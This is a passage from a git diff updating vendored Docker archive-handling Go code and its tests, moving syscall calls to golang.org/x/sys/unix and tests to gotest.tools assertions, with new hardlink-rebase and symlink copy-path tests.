stat value to syscall.Stat_t") - return + if ok { + // Currently go does not fill in the major/minors + if s.Mode&unix.S_IFBLK != 0 || + s.Mode&unix.S_IFCHR != 0 { + hdr.Devmajor = int64(unix.Major(uint64(s.Rdev))) // nolint: unconvert + hdr.Devminor = int64(unix.Minor(uint64(s.Rdev))) // nolint: unconvert + } } - inode = uint64(s.Ino) + return +} + +func getInodeFromStat(stat interface{}) (inode uint64, err error) { + s, ok := stat.(*syscall.Stat_t) - // Currently go does not fill in the major/minors - if s.Mode&syscall.S_IFBLK != 0 || - s.Mode&syscall.S_IFCHR != 0 { - hdr.Devmajor = int64(major(uint64(s.Rdev))) - hdr.Devminor = int64(minor(uint64(s.Rdev))) + if ok { + inode = s.Ino } return } -func getFileUIDGID(stat interface{}) (int, int, error) { +func getFileUIDGID(stat interface{}) (idtools.IDPair, error) { s, ok := stat.(*syscall.Stat_t) if !ok { - return -1, -1, errors.New("cannot convert stat value to syscall.Stat_t") + return idtools.IDPair{}, errors.New("cannot convert stat value to syscall.Stat_t") } - return int(s.Uid), int(s.Gid), nil -} - -func major(device uint64) uint64 { - return (device >> 8) & 0xfff -} - -func minor(device uint64) uint64 { - return (device & 0xff) | ((device >> 12) & 0xfff00) + return idtools.IDPair{UID: int(s.Uid), GID: int(s.Gid)}, nil } // handleTarTypeBlockCharFifo is an OS-specific helper function used by @@ -89,17 +88,14 @@ func handleTarTypeBlockCharFifo(hdr *tar.Header, path string) error { mode := uint32(hdr.Mode & 07777) switch hdr.Typeflag { case tar.TypeBlock: - mode |= syscall.S_IFBLK + mode |= unix.S_IFBLK case tar.TypeChar: - mode |= syscall.S_IFCHR + mode |= unix.S_IFCHR case tar.TypeFifo: - mode |= syscall.S_IFIFO + mode |= unix.S_IFIFO } - if err := system.Mknod(path, mode, int(system.Mkdev(hdr.Devmajor, hdr.Devminor))); err != nil { - return err - } - return nil + return system.Mknod(path, mode, int(system.Mkdev(hdr.Devmajor, hdr.Devminor))) } func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error { diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go index 4eeafdd128..808878d094 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "bytes" @@ -8,11 +8,15 @@ import ( "io/ioutil" "os" "path/filepath" - "runtime" + "strings" "syscall" "testing" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) func TestCanonicalTarNameForPath(t *testing.T) { @@ -69,60 +73,89 @@ func TestChmodTarEntry(t *testing.T) { func TestTarWithHardLink(t *testing.T) { origin, err := ioutil.TempDir("", "docker-test-tar-hardlink") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(origin) - if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { - t.Fatal(err) - } - if err := os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")); err != nil { - t.Fatal(err) - } + + err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700) + assert.NilError(t, err) + + err = os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")) + assert.NilError(t, err) var i1, i2 uint64 - if i1, err = getNlink(filepath.Join(origin, "1")); err != nil { - t.Fatal(err) - } + i1, err = getNlink(filepath.Join(origin, "1")) + assert.NilError(t, err) + // sanity check that we can hardlink if i1 != 2 { t.Skipf("skipping since hardlinks don't work here; expected 2 links, got %d", i1) } dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(dest) // we'll do this in two steps to separate failure fh, err := Tar(origin, Uncompressed) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) // ensure we can read the whole thing with no error, before writing back out buf, err := ioutil.ReadAll(fh) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) bRdr := bytes.NewReader(buf) err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed}) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - if i1, err = getInode(filepath.Join(dest, "1")); err != nil { - t.Fatal(err) - } - if i2, err = getInode(filepath.Join(dest, "2")); err != nil { - t.Fatal(err) - } + i1, err = getInode(filepath.Join(dest, "1")) + assert.NilError(t, err) - if i1 != i2 { - t.Errorf("expected matching inodes, but got %d and %d", i1, i2) + i2, err = getInode(filepath.Join(dest, "2")) + assert.NilError(t, err) + + assert.Check(t, is.Equal(i1, i2)) +} + +func TestTarWithHardLinkAndRebase(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "docker-test-tar-hardlink-rebase") + assert.NilError(t, err) + defer os.RemoveAll(tmpDir) + + origin := filepath.Join(tmpDir, "origin") + err = os.Mkdir(origin, 0700) + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700) + assert.NilError(t, err) + + err = os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")) + assert.NilError(t, err) + + var i1, i2 uint64 + i1, err = getNlink(filepath.Join(origin, "1")) + assert.NilError(t, err) + + // sanity check that we can hardlink + if i1 != 2 { + t.Skipf("skipping since hardlinks don't work here; expected 2 links, got %d", i1) } + + dest := filepath.Join(tmpDir, "dest") + bRdr, err := TarResourceRebase(origin, "origin") + assert.NilError(t, err) + + dstDir, srcBase := SplitPathDirEntry(origin) + _, dstBase := SplitPathDirEntry(dest) + content := RebaseArchiveEntries(bRdr, srcBase, dstBase) + err = Untar(content, dstDir, &TarOptions{Compression: Uncompressed, NoLchown: true, NoOverwriteDirNonDir: true}) + assert.NilError(t, err) + + i1, err = getInode(filepath.Join(dest, "1")) + assert.NilError(t, err) + i2, err = getInode(filepath.Join(dest, "2")) + assert.NilError(t, err) + + assert.Check(t, is.Equal(i1, i2)) } func getNlink(path string) (uint64, error) { @@ -151,52 +184,40 @@ func getInode(path string) (uint64, error) { } func TestTarWithBlockCharFifo(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") origin, err := ioutil.TempDir("", "docker-test-tar-hardlink") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + defer os.RemoveAll(origin) - if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { - t.Fatal(err) - } - if err := system.Mknod(filepath.Join(origin, "2"), syscall.S_IFBLK, int(system.Mkdev(int64(12), int64(5)))); err != nil { - t.Fatal(err) - } - if err := system.Mknod(filepath.Join(origin, "3"), syscall.S_IFCHR, int(system.Mkdev(int64(12), int64(5)))); err != nil { - t.Fatal(err) - } - if err := system.Mknod(filepath.Join(origin, "4"), syscall.S_IFIFO, int(system.Mkdev(int64(12), int64(5)))); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700) + assert.NilError(t, err) + + err = system.Mknod(filepath.Join(origin, "2"), unix.S_IFBLK, int(system.Mkdev(int64(12), int64(5)))) + assert.NilError(t, err) + err = system.Mknod(filepath.Join(origin, "3"), unix.S_IFCHR, int(system.Mkdev(int64(12), int64(5)))) + assert.NilError(t, err) + err = system.Mknod(filepath.Join(origin, "4"), unix.S_IFIFO, int(system.Mkdev(int64(12), int64(5)))) + assert.NilError(t, err) dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(dest) // we'll do this in two steps to separate failure fh, err := Tar(origin, Uncompressed) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) // ensure we can read the whole thing with no error, before writing back out buf, err := ioutil.ReadAll(fh) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) bRdr := bytes.NewReader(buf) err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed}) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) changes, err := ChangesDirs(origin, dest) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + if len(changes) > 0 { t.Fatalf("Tar with special device (block, char, fifo) should keep them (recreate them when untar) : %v", changes) } @@ -204,26 +225,19 @@ func TestTarWithBlockCharFifo(t *testing.T) { // TestTarUntarWithXattr is Unix as Lsetxattr is not supported on Windows func TestTarUntarWithXattr(t *testing.T) { - if runtime.GOOS == "solaris" { - t.Skip() - } + skip.If(t, os.Getuid() != 0, "skipping test that requires root") origin, err := ioutil.TempDir("", "docker-test-untar-origin") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(origin) - if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { - t.Fatal(err) - } - if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil { - t.Fatal(err) - } - if err := ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700); err != nil { - t.Fatal(err) - } - if err := system.Lsetxattr(filepath.Join(origin, "2"), "security.capability", []byte{0x00}, 0); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700) + assert.NilError(t, err) + + err = ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700) + assert.NilError(t, err) + err = ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700) + assert.NilError(t, err) + err = system.Lsetxattr(filepath.Join(origin, "2"), "security.capability", []byte{0x00}, 0) + assert.NilError(t, err) for _, c := range []Compression{ Uncompressed, @@ -247,3 +261,58 @@ func TestTarUntarWithXattr(t *testing.T) { } } } + +func TestCopyInfoDestinationPathSymlink(t *testing.T) { + tmpDir, _ := getTestTempDirs(t) + defer removeAllPaths(tmpDir) + + root := strings.TrimRight(tmpDir, "/") + "/" + + type FileTestData struct { + resource FileData + file string + expected CopyInfo + } + + testData := []FileTestData{ + //Create a directory: /tmp/archive-copy-test*/dir1 + //Test will "copy" file1 to dir1 + {resource: FileData{filetype: Dir, path: "dir1", permissions: 0740}, file: "file1", expected: CopyInfo{Path: root + "dir1/file1", Exists: false, IsDir: false}}, + + //Create a symlink directory to dir1: /tmp/archive-copy-test*/dirSymlink -> dir1 + //Test will "copy" file2 to dirSymlink + {resource: FileData{filetype: Symlink, path: "dirSymlink", contents: root + "dir1", permissions: 0600}, file: "file2", expected: CopyInfo{Path: root + "dirSymlink/file2", Exists: false, IsDir: false}}, + + //Create a file in tmp directory: /tmp/archive-copy-test*/file1 + //Test to cover when the full file path already exists. + {resource: FileData{filetype: Regular, path: "file1", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "file1", Exists: true}}, + + //Create a directory: /tmp/archive-copy*/dir2 + //Test to cover when the full directory path already exists + {resource: FileData{filetype: Dir, path: "dir2", permissions: 0740}, file: "", expected: CopyInfo{Path: root + "dir2", Exists: true, IsDir: true}}, + + //Create a symlink to a non-existent target: /tmp/archive-copy*/symlink1 -> noSuchTarget + //Negative test to cover symlinking to a target that does not exit + {resource: FileData{filetype: Symlink, path: "symlink1", contents: "noSuchTarget", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "noSuchTarget", Exists: false}}, + + //Create a file in tmp directory for next test: /tmp/existingfile + {resource: FileData{filetype: Regular, path: "existingfile", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "existingfile", Exists: true}}, + + //Create a symlink to an existing file: /tmp/archive-copy*/symlink2 -> /tmp/existingfile + //Test to cover when the parent directory of a new file is a symlink + {resource: FileData{filetype: Symlink, path: "symlink2", contents: "existingfile", permissions: 0600}, file: "", expected: CopyInfo{Path: root + "existingfile", Exists: true}}, + } + + var dirs []FileData + for _, data := range testData { + dirs = append(dirs, data.resource) + } + provisionSampleDir(t, tmpDir, dirs) + + for _, info := range testData { + p := filepath.Join(tmpDir, info.resource.path, info.file) + ci, err := CopyInfoDestinationPath(p) + assert.Check(t, err) + assert.Check(t, is.DeepEqual(info.expected, ci)) + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go index 5c3a1be340..69aadd823c 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_windows.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -9,6 +7,7 @@ import ( "path/filepath" "strings" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/longpath" ) @@ -42,15 +41,23 @@ func CanonicalTarNameForPath(p string) (string, error) { // chmodTarEntry is used to adjust the file permissions used in tar header based // on the platform the archival is done. func chmodTarEntry(perm os.FileMode) os.FileMode { - perm &= 0755 + //perm &= 0755 // this 0-ed out tar flags (like link, regular file, directory marker etc.) + permPart := perm & os.ModePerm + noPermPart := perm &^ os.ModePerm // Add the x bit: make everything +x from windows - perm |= 0111 + permPart |= 0111 + permPart &= 0755 + + return noPermPart | permPart +} - return perm +func setHeaderForSpecialDevice(hdr *tar.Header, name string, stat interface{}) (err error) { + // do nothing. no notion of Rdev, Nlink in stat on Windows + return } -func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) { - // do nothing. no notion of Rdev, Inode, Nlink in stat on Windows +func getInodeFromStat(stat interface{}) (inode uint64, err error) { + // do nothing. no notion of Inode in stat on Windows return } @@ -64,7 +71,7 @@ func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error { return nil } -func getFileUIDGID(stat interface{}) (int, int, error) { +func getFileUIDGID(stat interface{}) (idtools.IDPair, error) { // no notion of file ownership mapping yet on Windows - return 0, 0, nil + return idtools.IDPair{UID: 0, GID: 0}, nil } diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go index 0c6733d6bd..b3dbb32754 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go @@ -1,6 +1,6 @@ // +build windows -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "io/ioutil" @@ -27,7 +27,7 @@ func TestCopyFileWithInvalidDest(t *testing.T) { t.Fatal(err) } ioutil.WriteFile(src, []byte("content"), 0777) - err = CopyWithTar(src, dest) + err = defaultCopyWithTar(src, dest) if err == nil { t.Fatalf("archiver.CopyWithTar should throw an error on invalid dest.") } @@ -82,6 +82,8 @@ func TestChmodTarEntry(t *testing.T) { {0644, 0755}, {0755, 0755}, {0444, 0555}, + {0755 | os.ModeDir, 0755 | os.ModeDir}, + {0755 | os.ModeSymlink, 0755 | os.ModeSymlink}, } for _, v := range cases { if out := chmodTarEntry(v.in); out != v.expected { diff --git a/vendor/github.com/docker/docker/pkg/archive/changes.go b/vendor/github.com/docker/docker/pkg/archive/changes.go index c07d55cbd9..43734db5b1 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -13,10 +13,10 @@ import ( "syscall" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/pools" "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) // ChangeType represents the change type. @@ -267,7 +267,7 @@ func (info *FileInfo) addChanges(oldInfo *FileInfo, changes *[]Change) { } for name, newChild := range info.children { - oldChild, _ := oldChildren[name] + oldChild := oldChildren[name] if oldChild != nil { // change? oldStat := oldChild.stat @@ -279,7 +279,7 @@ func (info *FileInfo) addChanges(oldInfo *FileInfo, changes *[]Change) { // breaks down is if some code intentionally hides a change by setting // back mtime if statDifferent(oldStat, newStat) || - bytes.Compare(oldChild.capability, newChild.capability) != 0 { + !bytes.Equal(oldChild.capability, newChild.capability) { change := Change{ Path: newChild.path(), Kind: ChangeModify, @@ -394,13 +394,8 @@ func ChangesSize(newDir string, changes []Change) int64 { func ExportChanges(dir string, changes []Change, uidMaps, gidMaps []idtools.IDMap) (io.ReadCloser, error) { reader, writer := io.Pipe() go func() { - ta := &tarAppender{ - TarWriter: tar.NewWriter(writer), - Buffer: pools.BufioWriter32KPool.Get(nil), - SeenFiles: make(map[uint64]string), - UIDMaps: uidMaps, - GIDMaps: gidMaps, - } + ta := newTarAppender(idtools.NewIDMappingsFromMaps(uidMaps, gidMaps), writer, nil) + // this buffer is needed for the duration of this piped stream defer pools.BufioWriter32KPool.Put(ta.Buffer) diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_linux.go b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go index fc5a9dfdb9..78a5393c8e 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_linux.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_linux.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "bytes" @@ -10,6 +10,7 @@ import ( "unsafe" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" ) // walker is used to implement collectFileInfoForChanges on linux. Where this @@ -65,7 +66,7 @@ func walkchunk(path string, fi os.FileInfo, dir string, root *FileInfo) error { } parent := root.LookUp(filepath.Dir(path)) if parent == nil { - return fmt.Errorf("collectFileInfoForChanges: Unexpectedly no parent for %s", path) + return fmt.Errorf("walkchunk: Unexpectedly no parent for %s", path) } info := &FileInfo{ name: filepath.Base(path), @@ -233,7 +234,7 @@ func readdirnames(dirname string) (names []nameIno, err error) { // Refill the buffer if necessary if bufp >= nbuf { bufp = 0 - nbuf, err = syscall.ReadDirent(int(f.Fd()), buf) // getdents on linux + nbuf, err = unix.ReadDirent(int(f.Fd()), buf) // getdents on linux if nbuf < 0 { nbuf = 0 } @@ -255,12 +256,12 @@ func readdirnames(dirname string) (names []nameIno, err error) { return sl, nil } -// parseDirent is a minor modification of syscall.ParseDirent (linux version) +// parseDirent is a minor modification of unix.ParseDirent (linux version) // which returns {name,inode} pairs instead of just names. func parseDirent(buf []byte, names []nameIno) (consumed int, newnames []nameIno) { origlen := len(buf) for len(buf) > 0 { - dirent := (*syscall.Dirent)(unsafe.Pointer(&buf[0])) + dirent := (*unix.Dirent)(unsafe.Pointer(&buf[0])) buf = buf[dirent.Reclen:] if dirent.Ino == 0 { // File absent in directory. continue @@ -293,7 +294,7 @@ func OverlayChanges(layers []string, rw string) ([]Change, error) { func overlayDeletedFile(root, path string, fi os.FileInfo) (string, error) { if fi.Mode()&os.ModeCharDevice != 0 { s := fi.Sys().(*syscall.Stat_t) - if major(uint64(s.Rdev)) == 0 && minor(uint64(s.Rdev)) == 0 { + if unix.Major(uint64(s.Rdev)) == 0 && unix.Minor(uint64(s.Rdev)) == 0 { // nolint: unconvert return path, nil } } diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_other.go b/vendor/github.com/docker/docker/pkg/archive/changes_other.go index da70ed37c4..ba744741cd 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_other.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_other.go @@ -1,6 +1,6 @@ // +build !linux -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go index 095102e578..019a0250f3 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_posix_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" @@ -7,16 +7,11 @@ import ( "io/ioutil" "os" "path" - "runtime" "sort" "testing" ) func TestHardLinkOrder(t *testing.T) { - //TODO Should run for Solaris - if runtime.GOOS == "solaris" { - t.Skip("gcp failures on Solaris") - } names := []string{"file1.txt", "file2.txt", "file3.txt"} msg := []byte("Hey y'all") @@ -117,7 +112,7 @@ func (th tarHeaders) Less(i, j int) bool { return th[i].Name < th[j].Name } func walkHeaders(r io.Reader) ([]tar.Header, error) { t := tar.NewReader(r) - headers := []tar.Header{} + var headers []tar.Header for { hdr, err := t.Next() if err != nil { diff --git a/vendor/github.com/docker/docker/pkg/archive/changes_test.go b/vendor/github.com/docker/docker/pkg/archive/changes_test.go index eae1d022c7..f2527cd936 100644 --- a/vendor/github.com/docker/docker/pkg/archive/changes_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/changes_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "io/ioutil" @@ -11,6 +11,8 @@ import ( "time" "github.com/docker/docker/pkg/system" + "gotest.tools/assert" + "gotest.tools/skip" ) func max(x, y int) int { @@ -21,15 +23,7 @@ func max(x, y int) int { } func copyDir(src, dst string) error { - cmd := exec.Command("cp", "-a", src, dst) - if runtime.GOOS == "solaris" { - cmd = exec.Command("gcp", "-a", src, dst) - } - - if err := cmd.Run(); err != nil { - return err - } - return nil + return exec.Command("cp", "-a", src, dst).Run() } type FileType uint32 @@ -49,63 +43,62 @@ type FileData struct { func createSampleDir(t *testing.T, root string) { files := []FileData{ - {Regular, "file1", "file1\n", 0600}, - {Regular, "file2", "file2\n", 0666}, - {Regular, "file3", "file3\n", 0404}, - {Regular, "file4", "file4\n", 0600}, - {Regular, "file5", "file5\n", 0600}, - {Regular, "file6", "file6\n", 0600}, - {Regular, "file7", "file7\n", 0600}, - {Dir, "dir1", "", 0740}, - {Regular, "dir1/file1-1", "file1-1\n", 01444}, - {Regular, "dir1/file1-2", "file1-2\n", 0666}, - {Dir, "dir2", "", 0700}, - {Regular, "dir2/file2-1", "file2-1\n", 0666}, - {Regular, "dir2/file2-2", "file2-2\n", 0666}, - {Dir, "dir3", "", 0700}, - {Regular, "dir3/file3-1", "file3-1\n", 0666}, - {Regular, "dir3/file3-2", "file3-2\n", 0666}, - {Dir, "dir4", "", 0700}, - {Regular, "dir4/file3-1", "file4-1\n", 0666}, - {Regular, "dir4/file3-2", "file4-2\n", 0666}, - {Symlink, "symlink1", "target1", 0666}, - {Symlink, "symlink2", "target2", 0666}, - {Symlink, "symlink3", root + "/file1", 0666}, - {Symlink, "symlink4", root + "/symlink3", 0666}, - {Symlink, "dirSymlink", root + "/dir1", 0740}, - } + {filetype: Regular, path: "file1", contents: "file1\n", permissions: 0600}, + {filetype: Regular, path: "file2", contents: "file2\n", permissions: 0666}, + {filetype: Regular, path: "file3", contents: "file3\n", permissions: 0404}, + {filetype: Regular, path: "file4", contents: "file4\n", permissions: 0600}, + {filetype: Regular, path: "file5", contents: "file5\n", permissions: 0600}, + {filetype: Regular, path: "file6", contents: "file6\n", permissions: 0600}, + {filetype: Regular, path: "file7", contents: "file7\n", permissions: 0600}, + {filetype: Dir, path: "dir1", contents: "", permissions: 0740}, + {filetype: Regular, path: "dir1/file1-1", contents: "file1-1\n", permissions: 01444}, + {filetype: Regular, path: "dir1/file1-2", contents: "file1-2\n", permissions: 0666}, + {filetype: Dir, path: "dir2", contents: "", permissions: 0700}, + {filetype: Regular, path: "dir2/file2-1", contents: "file2-1\n", permissions: 0666}, + {filetype: Regular, path: "dir2/file2-2", contents: "file2-2\n", permissions: 0666}, + {filetype: Dir, path: "dir3", contents: "", permissions: 0700}, + {filetype: Regular, path: "dir3/file3-1", contents: "file3-1\n", permissions: 0666}, + {filetype: Regular, path: "dir3/file3-2", contents: "file3-2\n", permissions: 0666}, + {filetype: Dir, path: "dir4", contents: "", permissions: 0700}, + {filetype: Regular, path: "dir4/file3-1", contents: "file4-1\n", permissions: 0666}, + {filetype: Regular, path: "dir4/file3-2", contents: "file4-2\n", permissions: 0666}, + {filetype: Symlink, path: "symlink1", contents: "target1", permissions: 0666}, + {filetype: Symlink, path: "symlink2", contents: "target2", permissions: 0666}, + {filetype: Symlink, path: "symlink3", contents: root + "/file1", permissions: 0666}, + {filetype: Symlink, path: "symlink4", contents: root + "/symlink3", permissions: 0666}, + {filetype: Symlink, path: "dirSymlink", contents: root + "/dir1", permissions: 0740}, + } + provisionSampleDir(t, root, files) +} +func provisionSampleDir(t *testing.T, root string, files []FileData) { now := time.Now() for _, info := range files { p := path.Join(root, info.path) if info.filetype == Dir { - if err := os.MkdirAll(p, info.permissions); err != nil { - t.Fatal(err) - } + err := os.MkdirAll(p, info.permissions) + assert.NilError(t, err) } else if info.filetype == Regular { - if err := ioutil.WriteFile(p, []byte(info.contents), info.permissions); err != nil { - t.Fatal(err) - } + err := ioutil.WriteFile(p, []byte(info.contents), info.permissions) + assert.NilError(t, err) } else if info.filetype == Symlink { - if err := os.Symlink(info.contents, p); err != nil { - t.Fatal(err) - } + err := os.Symlink(info.contents, p) + assert.NilError(t, err) } if info.filetype != Symlink { // Set a consistent ctime, atime for all files and dirs - if err := system.Chtimes(p, now, now); err != nil { - t.Fatal(err) - } + err := system.Chtimes(p, now, now) + assert.NilError(t, err) } } } func TestChangeString(t *testing.T) { - modifiyChange := Change{"change", ChangeModify} - toString := modifiyChange.String() + modifyChange := Change{"change", ChangeModify} + toString := modifyChange.String() if toString != "C change" { - t.Fatalf("String() of a change with ChangeModifiy Kind should have been %s but was %s", "C change", toString) + t.Fatalf("String() of a change with ChangeModify Kind should have been %s but was %s", "C change", toString) } addChange := Change{"change", ChangeAdd} toString = addChange.String() @@ -126,20 +119,14 @@ func TestChangesWithNoChanges(t *testing.T) { t.Skip("symlinks on Windows") } rwLayer, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(rwLayer) layer, err := ioutil.TempDir("", "docker-changes-test-layer") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(layer) createSampleDir(t, layer) changes, err := Changes([]string{layer}, rwLayer) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if len(changes) != 0 { t.Fatalf("Changes with no difference should have detect no changes, but detected %d", len(changes)) } @@ -153,18 +140,14 @@ func TestChangesWithChanges(t *testing.T) { } // Mock the readonly layer layer, err := ioutil.TempDir("", "docker-changes-test-layer") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(layer) createSampleDir(t, layer) os.MkdirAll(path.Join(layer, "dir1/subfolder"), 0740) // Mock the RW layer rwLayer, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(rwLayer) // Create a folder in RW layer @@ -181,9 +164,7 @@ func TestChangesWithChanges(t *testing.T) { ioutil.WriteFile(newFile, []byte{}, 0740) changes, err := Changes([]string{layer}, rwLayer) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) expectedChanges := []Change{ {"/dir1", ChangeModify}, @@ -203,6 +184,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { t.Skip("symlinks on Windows") } baseLayer, err := ioutil.TempDir("", "docker-changes-test.") + assert.NilError(t, err) defer os.RemoveAll(baseLayer) dir3 := path.Join(baseLayer, "dir1/dir2/dir3") @@ -212,6 +194,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { ioutil.WriteFile(file, []byte("hello"), 0666) layer, err := ioutil.TempDir("", "docker-changes-test2.") + assert.NilError(t, err) defer os.RemoveAll(layer) // Test creating a new file @@ -224,9 +207,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { ioutil.WriteFile(file, []byte("bye"), 0666) changes, err := Changes([]string{baseLayer}, layer) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) expectedChanges := []Change{ {"/dir1/dir2/dir3", ChangeModify}, @@ -236,6 +217,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { // Now test changing a file layer, err = ioutil.TempDir("", "docker-changes-test3.") + assert.NilError(t, err) defer os.RemoveAll(layer) if err := copyDir(baseLayer+"/dir1", layer+"/"); err != nil { @@ -246,9 +228,7 @@ func TestChangesWithChangesGH13590(t *testing.T) { ioutil.WriteFile(file, []byte("bye"), 0666) changes, err = Changes([]string{baseLayer}, layer) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) expectedChanges = []Change{ {"/dir1/dir2/dir3/file.txt", ChangeModify}, @@ -260,25 +240,19 @@ func TestChangesWithChangesGH13590(t *testing.T) { func TestChangesDirsEmpty(t *testing.T) { // TODO Windows. There may be a way of running this, but turning off for now // as createSampleDir uses symlinks. - // TODO Should work for Solaris - if runtime.GOOS == "windows" || runtime.GOOS == "solaris" { - t.Skip("symlinks on Windows; gcp failure on Solaris") + if runtime.GOOS == "windows" { + t.Skip("symlinks on Windows") } src, err := ioutil.TempDir("", "docker-changes-test") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(src) createSampleDir(t, src) dst := src + "-copy" - if err := copyDir(src, dst); err != nil { - t.Fatal(err) - } + err = copyDir(src, dst) + assert.NilError(t, err) defer os.RemoveAll(dst) changes, err := ChangesDirs(dst, src) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) if len(changes) != 0 { t.Fatalf("Reported changes for identical dirs: %v", changes) @@ -289,108 +263,86 @@ func TestChangesDirsEmpty(t *testing.T) { func mutateSampleDir(t *testing.T, root string) { // Remove a regular file - if err := os.RemoveAll(path.Join(root, "file1")); err != nil { - t.Fatal(err) - } + err := os.RemoveAll(path.Join(root, "file1")) + assert.NilError(t, err) // Remove a directory - if err := os.RemoveAll(path.Join(root, "dir1")); err != nil { - t.Fatal(err) - } + err = 